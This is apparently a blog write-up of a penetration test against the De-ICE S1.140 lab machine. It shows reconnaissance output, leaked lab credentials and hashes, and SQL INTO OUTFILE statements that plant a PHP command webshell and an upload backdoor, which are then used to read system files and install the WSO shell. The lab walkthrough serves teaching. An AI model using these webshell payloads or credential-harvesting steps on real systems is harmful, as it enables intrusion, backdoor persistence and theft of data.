Adeptus-Mechanicus

Main
Codex
Librarium Whitehat
Advisories
Blog Pics
"Inveniam viam aut faciam" : I will either find a way, or I shall make one


Penetration Testing Showcase - DEICE-S1.140
Author - Raluca Blidaru

Are penetration testing phases different from the ones of a malicious attack? The answer is no. Both malicious attackers and penetration testers go through the same stages or phases in their attacks/tests: 
1. Gathering Information phase. During this stage, as much as possible data on the target is collected (e.g. the target IP address range, domain name registration records, mail server records, etc.), to design the blueprint of the target.
2. Scanning phase. The target is scanned for entry points such as wireless access points, lnternet gateways, available systems, running services, vulnerability lists, and port listening. Other tests would check if default user IDs, passwords, and guest passwords have been disabled or changed and no remote login is allowed.
3. Gaining Access phase. Based on the vulnerabilities which were identified during scanning, attempts are made to access the system. To accomplish this task, one could use automated exploit tools, or legitimate information obtained from social engineering.
4. Maintaining Access phase. Once access has been acquired, attempts are made to escalate the privileges to root/admin and then to upload a piece of code (also named “backdoor”) on the target so that access to the target is maintained independent from the authorized entry points into the system/network. This will allow to connect to the target anytime.
5. Covering Tracks phase. This phase is same important as the previous ones, as leaving a mark can show how elevated access to protected resources can be obtained and this information can be later on maliciously be used by others with access to the system. This phase involves restoring the system to normal pretest configurations, which includes removing files, cleaning logs, registry entries, deleting the uploaded backdoor, etc.

Please note that an effective penetration exercise, malicious or not, would follow these phases, but it is very likely that the tester (or the hacker) would move around between this steps, depending on the discoveries that are made. For example, during the gathering information phase, an exploitable flow is identified and it is used immediately to gain access into the target, without scanning it. In this case, the scanning will be performed after Gaining Access phase. 

Now it’s time to showcase.
The example I am proposing mimics a real-life scenario, where an enterprise hires a security professional to test their systems/network to prove that internal confidential data is properly protected. In these types of engagements, no additional information is provided to the assessor.
The action is happening in my Virtual Test Lab.



============== VIRTUAL TEST LAB =================
|    ==== 192.168.100.130 ===            ==== 192.168.100.138 ===    |
|    |                                               |            |                                            |    |
|    |         KALI VM                     |            |        TARGET VM              |    |
|    |                                               |            |                                             |    |
|    ==================               ==================    |
=============================================


I am performing a penetration test against one machine about which I have no much information. All I know is that a sensitive file is located under the root/admin home folder. Can I get it? I think so, but let’s see how, step by step, following the phased approach described in the introductory part of this article.

1. Gathering Information phase:
a) Let’s find the IP of the Target machine. Any of the tools used returned the same information. The IP of the Target machine is 192.168.100.138:
root@kali:~# fping -a -g 192.168.100.2 192.168.100.253 2> /dev/null
192.168.100.130                     (this is my KALI machine)
192.168.100.138                     (this is the Target machine)
root@kali:~#



root@kali:~# nmap -sS 192.168.100.2-253
Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-17 22:49 EDT
Nmap scan report for 192.168.100.138    (this is the Target machine)
Host is up (0.0011s latency).
Not shown: 993 filtered ports
PORT    STATE  SERVICE
21/tcp  open   ftp
22/tcp  open   ssh
80/tcp  open   http
443/tcp open   https
465/tcp closed smtps
993/tcp open   imaps
995/tcp open   pop3s
MAC Address: 00:0C:29:E6:5B:22 (VMware)
Nmap scan report for 192.168.100.130
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.100.130 are closed
Nmap done: 256 IP addresses (4 hosts up) scanned in 38.67 seconds
root@kali:~#


root@kali:~# netdiscover -i eth0 -r 192.168.100.0/24 -p
Currently scanning: (passive)   |   Screen View: Unique Hosts                
212 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 12720          
 _____________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.100.1   00:50:56:c0:00:00    62    3720   VMWare, Inc.               
 192.168.100.138 00:0c:29:e6:5b:22    53    3180   VMware, Inc. (this is the Target machine)               
 192.168.100.254 00:50:56:ec:1e:5e    88    5280   VMWare, Inc.               
 0.0.0.0         00:50:56:c0:00:00    09    540   VMWare, Inc.                
root@kali:~#


b) Port 80 and 443 are open. Is any web application running on the Target machine? Yes, it is:

==== http://192.168.100.138 ============================================
|                      Welcome to                                                                                                                                |
|                    Lazy Admin Corp.                                                                                                                       |
|                    HackingLab!                                                                                                                                |
    You are employed by the management of LazyAdmin corp. to PenTest their                                    |
| Network. At this point you have managed to successfully break into the                                              |

| network. The goal is now to find and extract sensitive information.                                                      |
|                                                                                                                                                                            |
|                "I choose a lazy person to do a hard job.                                                                                       |
|            Because a lazy person will find an easy way to do it."                                                                    |
|                                ~ Bill Gates                                                                                                                       |
=================================================================


c) Let’s take a look to the source code of this page. It includes a section that it is not displayed to the end-user. It makes reference to a (web) forum that is “new” but available to the end-users, and it includes recommendations around the use of the passwords.

...
<font class="hidden">
1. Have you seen our new cool forum yet?<br><br>
2. Do not post sensitive information to public!<br><br>
3. Different passwords for different services. What is that for?!<br><br>
4. What if you are able to break out of your cell and manage to enter another one?<br><br>
5. Some things change from time to time, others don't.<br><br>
6. Sorry, no more hints available. There where more before we had to restore a very old backup. :(</font>



d) How we access this “forum”? Let’s try it, assuming that the name is “forum”. It’s working:
==== http://192.168.100.138/forum =====================
|   LazyAdmin corp.                          Log in | Register | Users                   |
|                                                                                                                         |
|  ...                                                                                                                    |
==============================================


e) “Users” page provides a list of users with access to the “Forum”. They are: admin, MBrown, RHedley, SWillard.

f) Going back to the main page, we find that this forum is public; anyone can access the messages posted, and not all of them are classified as “public” information. The first message from “Login Attacks” thread includes an extras from the access authorization log file, showing unsuccessful loggings, but not only:

...
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user !DFiuoTkbxtdk0! [preauth]
Mar 7 11:15:32 testbox sshd[5772]: Connection closed by 10.0.0.23 [preauth]
Mar 7 11:15:32 testbox sshd[5772]: Set /proc/self/oom_score_adj to 0
Mar 7 11:15:31 testbox sshd[5783]: Connection from 10.10.2.131 port 47651
Mar 7 11:15:32 testbox sshd[5779]: Invalid user bbanter from 10.10.2.131
Mar 7 11:15:32 testbox sshd[5779]: input_userauth_request: invalid user bbanter [preauth]
Mar 7 11:15:32 testbox sshd[5779]: pam_unix(sshd:auth): check pass; user unknown
Mar 7 11:15:32 testbox sshd[5779]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.10.2.131
Mar 7 11:15:32 testbox sshd[5775]: Failed password for invalid user benedictb from 10.10.2.131 port 46963 ssh2
Mar 7 11:15:32 testbox sshd[5768]: Failed password for invalid user genniege from 10.10.2.131 port 46488 ssh2
Mar 7 11:15:32 testbox sshd[5775]: Received disconnect from 10.10.2.131: 11: Bye Bye [preauth]
Mar 7 11:15:32 testbox sshd[5768]: Received disconnect from 10.10.2.131: 11: Bye Bye [preauth]
Mar 7 11:15:32 testbox sshd[5774]: Connection from 10.0.0.23 port 35155
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
Mar 7 11:15:32 testbox sshd[5774]: pam_unix(sshd:session): session opened for user mbrown by (uid=0)
...


What do we learn from here? Two connections have been initiated from the same IP address, 10.0.0.23, one unsuccessful, under username “!DFiuoTkbxtdk0!”, and the other one under username “mbrown”, and it was successfully this time. What are the chances to have a valid pair of username and password? Very high as, to many of us it happened, to enter the password instead of the username when trying to login; of course, it needs be proved that this is the case here. So let’s give a try. What are these credentials for? They are for connecting remotely, using “ssh”.

2. Gaining Access phase:
a) The remote access was not successful. Private/public key is required:
root@kali:~# ssh mbrown@192.168.100.138
The authenticity of host '192.168.100.138 (192.168.100.138)' can't be established.
ECDSA key fingerprint is 0b:33:73:4c:74:a2:1e:97:8c:87:bd:65:42:c9:86:7a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.100.138' (ECDSA) to the list of known hosts.
Permission denied (publickey).
root@kali:~# 

b) We can try on the “Forum”, testing if the same pair of credentials is giving us access. And they do. We are logged in as “MBrown”.

3. Gathering Information phase:
a) Being logged in as “MBrown”, we edit the profile of this user, and the email address for this user is there: mb@lazyadmin.corp. Does it follow a pattern? If yes, then the other users’ ones will be: rh@@lazyadmin.corp, and sw@@lazyadmin.corp. But for the moment this is just an assumption. It needs be proved.

b) At step 1.a, when we performed “nmap” test, port 993 was shown as open and imap service is running on it. Let’s try to connect remotely to this email service. The following sequence of commands will be used for reading emails from any of the email inboxes of M. Brown:
root@kali:~# openssl s_client -connect 192.168.100.138:993 –crlf
...
1 login mb@lazyadmin.corp  !DFiuoTkbxtdk0!
...
2 list "" "*"
...
3 select "INBOX.Drafts" | "INBOX" | "INBOX.Sent"
...
4 fetch 1 all
...
5 fetch 1 body[]
...
root@kali:~# 

    And three (3) emails addressed to M. Brown were downloaded from the server:
...
Date: Sat, 16 Mar 2013 20:19:41 +0100
Subject: Audit
From: sw@lazyadmin.corp
To: mb@lazyadmin.corp
User-Agent: SquirrelMail/1.4.22
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal

Hi Mark,

last we have made a password audit for all of our systems and we have seen that you are using the same password for a few services.
Please be so kind and change your passwords. Please keep in mind to use different passwords for different services. :)

Thank you!
Sandy

Closed
root@kali:~# 

...
Date: Sun, 10 Mar 2013 09:23:13 +0100
Subject:
From: sw@lazyadmin.corp
To: mb@lazyadmin.corp
User-Agent: SquirrelMail/1.4.22
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal

Hi,

here are the login-informations for mysql:

Username: root
Password: S4!y.dk)j/_d1pKtX1

Regards,
Sandy

Closed
root@kali:~# 

...
Date: Sun, 10 Mar 2013 09:24:53 +0100
Subject: Re:
From: mb@lazyadmin.corp
To: sw@lazyadmin.corp
User-Agent: SquirrelMail/1.4.22
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal

Thank you!

> Hi,
>
> here are the login-informations for PHPMyAdmin:
>
> Username: root
> Password: S4!y.dk)j/_d1pKtX1
>
> Regards,
> Sandy
>
>

Closed
root@kali:~# 


Before moving further, let’s pause and review what we’ve got so far:
A. We have a pair of  credentials to log into the “Forum”;
B. Same password gave us access to the email service;
C. From the email service we’ve learned about another set of credentials, used to access the phpMyAdmin service and to connect to the MySQL database.
 All these tell us that there are multiple services running on the box and instead to go with a guess on how to access them, firstly we could scan the system to see if any is left accessible from the outside world.

4. Scanning phase:
a) Scanning the web interfaces it’s easy with fuzzing, using either “wfuzz” or “dirb” tools, both available in Kali. Because of our focus, we will explore both port 80 and port 443. As we’ll see below, those web interfaces dedicated to administration services or accessing private information are available only through HTTPS, with the intention to protect the data being transferred between end-user and the corresponding portal while in transit through the network.

root@kali:~# wfuzz --hc 404 -c -z file,/usr/share/dirb/wordlists/common.txt http://192.168.100.138/FUZZ
********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************
Target: http://192.168.100.138/FUZZ
Payload type: file,/usr/share/dirb/wordlists/common.txt
Total requests: 4594
==================================================================
ID    Response   Lines      Word         Chars          Request   
==================================================================
00014:  C=403      8 L          22 W        211 Ch      " - .htaccess"
00009:  C=403      8 L          22 W        211 Ch      " - .htpasswd"
00010:  C=403      8 L          22 W        206 Ch      " - .hta"
00948:  C=403      8 L          22 W        210 Ch      " - cgi-bin/"
01759:  C=301      7 L          20 W        237 Ch      " - forum"
02087:  C=200    143 L         226 W       1782 Ch      " - index"
02088:  C=200    143 L         226 W       1782 Ch      " - index.html"
03594:  C=403      8 L          22 W        215 Ch      " - server-status"
root@kali:~#


root@kali:~# wfuzz --hc 404 -c -z file,/usr/share/dirb/wordlists/common.txt https://192.168.100.138/FUZZ
********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************
Target: https://192.168.100.138/FUZZ
Payload type: file,/usr/share/dirb/wordlists/common.txt
Total requests: 4594
==================================================================
ID    Response   Lines      Word         Chars          Request   
==================================================================
00001:  C=403      8 L          22 W        211 Ch      " - .htaccess"
00006:  C=403      8 L          22 W        211 Ch      " - .htpasswd"
00007:  C=403      8 L          22 W        206 Ch      " - .hta"
00946:  C=403      8 L          22 W        210 Ch      " - cgi-bin/"
01764:  C=301      7 L          20 W        238 Ch      " - forum"
02090:  C=200    143 L         226 W       1782 Ch      " - index"
02094:  C=200    143 L         226 W       1782 Ch      " - index.html"
03006:  C=301      7 L          20 W        243 Ch      " - phpmyadmin"
03599:  C=403      8 L          22 W        215 Ch      " - server-status"
04379:  C=301      7 L          20 W        240 Ch      " - webmail"
root@kali:~#



root@kali:~# dirb http://192.168.100.138/
-----------------
DIRB v2.21   
By The Dark Raver
-----------------
START_TIME: Sun Oct 18 10:56:57 2015
URL_BASE: http://192.168.100.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592                                                         
---- Scanning URL: http://192.168.100.138/ ----
+ http://192.168.100.138/cgi-bin/ (CODE:403|SIZE:210)                                                 
==> DIRECTORY: http://192.168.100.138/forum/                                                          
+ http://192.168.100.138/index (CODE:200|SIZE:1782)                                                   
+ http://192.168.100.138/index.html (CODE:200|SIZE:1782)                                              
+ http://192.168.100.138/server-status (CODE:403|SIZE:215)                                            
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/ ----
+ http://192.168.100.138/forum/LICENSE (CODE:200|SIZE:33093)                                          
+ http://192.168.100.138/forum/README (CODE:200|SIZE:730)                                             
==> DIRECTORY: http://192.168.100.138/forum/backup/                                                   
==> DIRECTORY: http://192.168.100.138/forum/config/                                                   
==> DIRECTORY: http://192.168.100.138/forum/images/                                                   
==> DIRECTORY: http://192.168.100.138/forum/includes/                                                 
+ http://192.168.100.138/forum/index (CODE:200|SIZE:7348)                                             
+ http://192.168.100.138/forum/index.php (CODE:200|SIZE:7348)                                         
==> DIRECTORY: http://192.168.100.138/forum/install/                                                  
==> DIRECTORY: http://192.168.100.138/forum/js/                                                       
==> DIRECTORY: http://192.168.100.138/forum/lang/                                                     
==> DIRECTORY: http://192.168.100.138/forum/modules/                                                  
==> DIRECTORY: http://192.168.100.138/forum/templates_c/                                              
==> DIRECTORY: http://192.168.100.138/forum/themes/                                                   
==> DIRECTORY: http://192.168.100.138/forum/update/                                                   
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/backup/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/install/ ----
+ http://192.168.100.138/forum/install/index (CODE:302|SIZE:0)                                        
+ http://192.168.100.138/forum/install/index.php (CODE:302|SIZE:0)                                    
+ http://192.168.100.138/forum/install/install (CODE:200|SIZE:12898)                                  
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/templates_c/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                      
---- Entering directory: http://192.168.100.138/forum/update/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                            
-----------------
DOWNLOADED: 13776 - FOUND: 11
root@kali:~# root@kali:~#


root@kali:~# dirb https://192.168.100.138/
-----------------
DIRB v2.21   
By The Dark Raver
-----------------
START_TIME: Sun Oct 18 10:39:33 2015
URL_BASE: https://192.168.100.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592                                                         
---- Scanning URL: https://192.168.100.138/ ----
+ https://192.168.100.138/cgi-bin/ (CODE:403|SIZE:210)                                                
==> DIRECTORY: https://192.168.100.138/forum/                                                         
+ https://192.168.100.138/index (CODE:200|SIZE:1782)                                                  
+ https://192.168.100.138/index.html (CODE:200|SIZE:1782)                                             
==> DIRECTORY: https://192.168.100.138/phpmyadmin/                                                    
+ https://192.168.100.138/server-status (CODE:403|SIZE:215)                                           
==> DIRECTORY: https://192.168.100.138/webmail/                                                       
                                                                                                      
---- Entering directory: https://192.168.100.138/forum/ ----
+ https://192.168.100.138/forum/LICENSE (CODE:200|SIZE:33093)                                         
+ https://192.168.100.138/forum/README (CODE:200|SIZE:730)                                            
==> DIRECTORY: https://192.168.100.138/forum/backup/                                                  
==> DIRECTORY: https://192.168.100.138/forum/config/                                                  
==> DIRECTORY: https://192.168.100.138/forum/images/                                                  
==> DIRECTORY: https://192.168.100.138/forum/includes/                                                
+ https://192.168.100.138/forum/index (CODE:200|SIZE:7348)                                            
+ https://192.168.100.138/forum/index.php (CODE:200|SIZE:7348)                                        
==> DIRECTORY: https://192.168.100.138/forum/install/                                                 
==> DIRECTORY: https://192.168.100.138/forum/js/                                                      
==> DIRECTORY: https://192.168.100.138/forum/lang/                                                    
==> DIRECTORY: https://192.168.100.138/forum/modules/                                                 
==> DIRECTORY: https://192.168.100.138/forum/templates_c/                                             
==> DIRECTORY: https://192.168.100.138/forum/themes/                                                  
==> DIRECTORY: https://192.168.100.138/forum/update/ 
                                                

---- Entering directory: https://192.168.100.138/phpmyadmin/ ----
+ https://192.168.100.138/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                
+ https://192.168.100.138/phpmyadmin/index.php (CODE:200|SIZE:7540)
...
root@kali:~#


5. Gaining Access phase:
a) Next we connect to phpMyAdmin interface (https://192.168.100.138/phpmyadmin/) using the credentials found in the email: username = “root”, password = “S4!y.dk)j/_d1pKtX1”. Access is granted. Exploring the databases in the list, their content, is the next logical step we’ll do, to gather more information on the system.

6. Gathering Information phase:
a) Looking after valid credentials:

SELECT `user_name`, `user_pw` FROM `mlf2_userdata`;    // forum
admin         fd339d53bf599d4ec7281ace84a902dc2ca16c7f63cbb16261
RHedley     31cbbdab9f5e1ebfa7d81267c258e29b5f9e171e6fcf7b1ba3
MBrown      8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1
SWillard      c19038340b8f5d1fc70e9bfbc3336f7bf1e0935da5ef13d4ef

SELECT `username`, `password` FROM `mailbox`;   // mail
rh@lazyadmin.corp     20f1275ce5e67be2c06476333b68f585
sw@lazyadmin.corp     07255e7701a86ad1672765d15082f1a3
mb@lazyadmin.corp     d768176c4486ce77787c73883406fe97
mp@lazyadmin.corp     fa514a9f39391658b15d5db542029aa6

SELECT `User`, `Password` FROM `user`;   // mysql
root              *05DE4B3ED9B4F36FAAEC8EF25689468318481FEB
debian-sys-maint     *27F84EF9FAA0E841963E4963EFC8D0EC7443A820
phpmyadmin         *1E8775B9D4F8EF5A6722E7E0C57BA5985872FB98
mail             *0616BA40862AA9B5B194CD196808176F644B2828
forum             *FEAFF5308E872DB9CFBB7585CD62CB7383B53E75

b) We found a lot of passwords, but all hashed. Let’s try crack them. The thought here is that we may be able to use these credentials to connect remotely to the target machine, via ftp or ssh services, or locally from a shell. We’ll do it in the most simple way - using online tools:
http://www.hashkiller.co.uk/md5-decrypter.aspx

20f1275ce5e67be2c06476333b68f585 MD5 : tum-ti-tum      
07255e7701a86ad1672765d15082f1a3 MD5 : Austin-Willard   
d768176c4486ce77787c73883406fe97 [Not found]       
                            //but we know this one:   !DFiuoTkbxtdk0!
fa514a9f39391658b15d5db542029aa6 [Not found]   


7. Maintaining Access phase:
a) So far, we were able to access remotely a few services on the target system but we were using the credentials of one of the authorized users. If the account is closed, or the password changed, we are losing all control we have so far on the target. This is the reason why we should look into creating our own backdoor into the system – we’ll upload a webshell on the server and from there we’ll run OS commands.

Here are the steps:
  1. find a directory with permissions – searching through the outputs from step 4.a, we get a list of folders that could potentially be listed (lookup for comment “(!) WARNING: Directory IS LISTABLE. No need to scan it.”). We load the URLs on the browser, one by one and test them, looking to the content of the files. Preferable is to find a folder listing PHP files, that we’ll use to host a PHP webshell of our choice. A good candidate is “https://192.168.100.138/forum/templates_c/”
  2. find SQL injection – using phpMyAdmin interface, we test if we can successfully run the following command that will save the output of the SELECT command into the “cmd.php” file. If the SQL statement is executed with no errors, then the new file should be listed at the URL identified above, and referenced here again: ”https://192.168.100.138/forum/templates_c/”.
SELECT `user_name` FROM `mlf2_userdata` WHERE `user_id`=1 UNION
SELECT "This is a test" into outfile "/var/www/forum/templates_c/cmd_test.php";

     3.  upload the webshell – similar as above, but running the next command instead:
SELECT `user_name` FROM `mlf2_userdata` WHERE `user_id`=1 UNION
SELECT "<? System($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/forum/templates_c/cmd.php";

..And BINGO, when referencing the following URL, the content of the / directory is listed:
http://192.168.100.138/forum/templates_c/cmd.php?cmd=ls / -all

b) Let’s search more information that could lead us to privilege escalation and access to the file located under root folder. We’ll start by listing contents of home folder of the users on the system, searching for clues:

http://192.168.100.138/forum/templates_c/cmd.php?cmd=ls /home/ftp -all
total 0
drwxrwxr-x+ 1 root root 60 May 14 2013 .
drwxr-xr-x 1 root root 100 Apr 3 2013 ..
d-wxrwx-wx+ 1 ftp ftpadmin 60 May 13 2013 incoming   


http://192.168.100.138/forum/templates_c/cmd.php?cmd=ls /home/sraines -all
total 0
drwxr-xr-x 2 1000 1000 36 May 12 2013 .
drwxr-xr-x 1 root root 100 Apr 3 2013 ..
-rw-r--r-- 1 root root 0 May 12 2013 .bash_history   

We observe that there is the “incoming” folder owned by “ftp” user, and every user on the system has “write” and “execute” permissions to this folder, but no “read” permissions. Is it any way to connect to it as “ftp” user to gain access to the content from this folder?

c) Let’s continue exploring the system files, and specifically the “/etc/group” file. As we can see, some of the users from the target machine are authorized to use the “ftp” service and/or the “ssh” services, or even do have privileged permissions on the system (“sudo”):

http://192.168.100.138/forum/templates_c/cmd.php?cmd=cat /etc/group
root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4: tty:x:5: disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24: floppy:x:25: tape:x:26: sudo:x:27:swillard audio:x:29: dip:x:30: www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46: staff:x:50: games:x:60: users:x:100: nogroup:x:65534: libuuid:x:101: crontab:x:102: syslog:x:103: fuse:x:104: messagebus:x:105: whoopsie:x:106: mlocate:x:107: ssh:x:108: landscape:x:109: netdev:x:110: lpadmin:x:111: sambashare:x:112: mysql:x:113: ssl-cert:x:114: dovecot:x:115: postfix:x:116: postdrop:x:117: memcache:x:118: ftpuser:x:997:rhedley,mbrown,ftp ftpadmin:x:999:rhedley,swillard sshlogin:x:998:swillard,mbrown mbrown:x:1001: rhedley:x:1002: swillard:x:1003: mparker:x:1004:   


8. Gaining Access phase:
a) We are trying now to connect to the Target machine via the “ftp” service. Because we are interested on accessing the “incoming” folder owned by the “ftp” user, and “ftpadmin” group, we’ll be using “rhedley” credentials - password = “tum-ti-tum”.

root@Kali:~# ftp 192.168.100.138
Connected to 192.168.100.138.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.100.138]
Name (192.168.100.138:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> pwd
257 "/rhedley" is the current directory
ftp> cd ..
250 CWD command successful
ftp> ls
227 Entering Passive Mode (192,168,100,138, 182, 138).
ftp: connect: Connection refused
ftp> quit
221 Goodbye.
root@Kali:~#


9. Gathering Information phase:
a) Can we access the “incoming” folder? Yes, and even more than that; we can download the content of the folder on our local machine:

root@Kali:~# ftp 192.168.100.138
Connected to 192.168.100.138.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.100.138]
Name (192.168.100.138:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/rhedley" is the current directory
ftp> cd ../ftp/incoming
250 CWD command successful
ftp> pwd
257 "/ftp/incoming" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w-   1 ftp      ftpuser     47984 Jan 11  2013 backup_webhost_130111.tar.gz.enc
226 Transfer complete
ftp> get backup_webhost_130111.tar.gz.enc /root/Desktop/backup_webhost_copy.tar.gz.enc
local: /root/Desktop/backup_webhost_copy.tar.gz.enc remote: backup_webhost_130111.tar.gz.enc
200 PORT command successful
150 Opening BINARY mode data connection for backup_webhost_130111.tar.gz.enc (47984 bytes)
226 Transfer complete
47984 bytes received in 0.00 secs (13.7918 MB/s)
ftp> exit
221 Goodbye.
root@kali:~# 
root@kali:~# ls /root/Desktop/ -all | grep 'backup'
-rw-r--r--  1 root root 47984 Oct 23 22:57 backup_webhost_copy.tar.gz.enc
root@kali:~#


b) Are there other “backup” files on the system? Maybe the script used to create the backup file in first place?

http://192.168.100.138/forum/templates_c/cmd.php?cmd=locate / | grep ‘backup’
/home/ftp/lac-backup.iso /home/ftp/lac-backup.iso.md5 /lib/modules/3.5.0-26-generic/kernel/drivers/power/wm831x_backup.ko /lib/modules/3.5.0-27-generic/kernel/drivers/power/wm831x_backup.ko /lib/modules/3.5.0-28-generic/kernel/drivers/power/wm831x_backup.ko /lib/partman/commit.d/20remove_backup /lib/partman/init.d/95backup /lib/partman/undo.d/70unbackup /opt/backup.sh /usr/bin/db5.1_hotbackup /usr/bin/db_hotbackup /usr/share/doc/tmux/examples/tmux_backup.sh /usr/share/man/man1/db5.1_hotbackup.1.gz /usr/share/man/man1/db_hotbackup.1.gz /usr/share/postfixadmin/backup.php /var/backups /var/backups/apt.extended_states.0 /var/backups/apt.extended_states.1.gz /var/backups/apt.extended_states.2.gz /var/backups/apt.extended_states.3.gz /var/backups/apt.extended_states.4.gz /var/backups/apt.extended_states.5.gz /var/backups/dpkg.status.0 /var/backups/dpkg.status.1.gz /var/backups/dpkg.status.2.gz /var/backups/dpkg.status.3.gz /var/backups/dpkg.status.4.gz /var/backups/dpkg.status.5.gz /var/backups/group.bak /var/backups/gshadow.bak /var/backups/mail-stack-delivery /var/backups/passwd.bak /var/backups/shadow.bak /var/backups/mail-stack-delivery/main.cf-backup /var/cache/dbconfig-common/backups /var/www/forum/backup /var/www/forum/backup/.htaccess /var/www/forum/themes/default/images/backup.png


Of course. There is a script, but its content is not available to other users than “root” and those that are part of “root” group:
http://192.168.100.138/forum/templates_c/cmd.php?cmd=ls /opt/backup.sh -all
admin -rwxrw----+ 1 root root 654 May 13 2013 /opt/backup.sh


10. Maintaining Access phase:
a) We need access to a shell on the Target machine. After searching for a few examples, I stopped at a php shell, wso2.5.1.php, available on GitHub. The file needs be uploaded on the Target machine

b) Firstly, we’ll add an upload function to the server. For this we’ll use the same approach as one at Step #7 – using phpMyAdmin we’ll run the following two scripts which in return will create two files on the server, one used to select the file to be uploaded (“upload.php”), and second (“getfile.php”) that will execute the upload to the predefined location. Here it is the code to be executed:
select '<!DOCTYPE html><head><title>File Upload Form</title></head><body>This form allows you to upload a file to the server.<br> <form action="getfile.php" method="post" enctype="multipart/form-data"><br>Type (or select) Filename: <input type="file" id="uploadFile" name="uploadFile"><input type="submit" value="Upload File"></form></body></html>'into outfile "/var/www/forum/templates_c/upload.php";
select "<!DOCTYPE html><head><title>Process Uploaded File</title></head><body><?php $my_folder = '/var/www/forum/templates_c/'; $my_folder = $my_folder.basename( $_FILES['uploadFile']['name']); chmod($my_folder, 0777); if (move_uploaded_file ($_FILES ['uploadFile'] ['tmp_name'], $my_folder)){ echo 'File is valid, and was successfully uploaded.\n'; chown($my_folder, 'root'); } else { echo 'Here is some more debugging info:';print_r($_FILES);echo '\n file name = '.$my_folder;}?></body></html>" into outfile "/var/www/forum/templates_c/getfile.php";


When referencing the following URL, we can validate that the two mentioned .php files were created:
http://192.168.100.138/forum/templates_c/

c)  Next we’ll access the “upload.php” file via the web browser and upload the “wso2.5.1.php” file that we just downloaded on the local machine. It is straight forward, so I will not give additional explanations. A message will be returned to the browser to confirm that the upload was successful.

d) Now that the php webshell is uploaded, let’s access it:

http://192.168.100.138/forum/templates_c/ wso2.5.1.php
=== http://192.168.100.138/forum/templates_c/wso2.5.1.php ==
|   Uname:                                                                                                 |

|   User:                                                                                                      |
|   Php:                                                                                                       |
|   Hdd:                                                                                                      |
|   Cwd:                                                                                                      |
|    [Sec. Info] [Files] [Console]       ...     [Network] [Selfremove]   |
|                                                                                                                  |
|                                                                                                                  |
|                                                                                                                  |
|                                                                                                                  |
|  ...                                                                                                             |
============================================


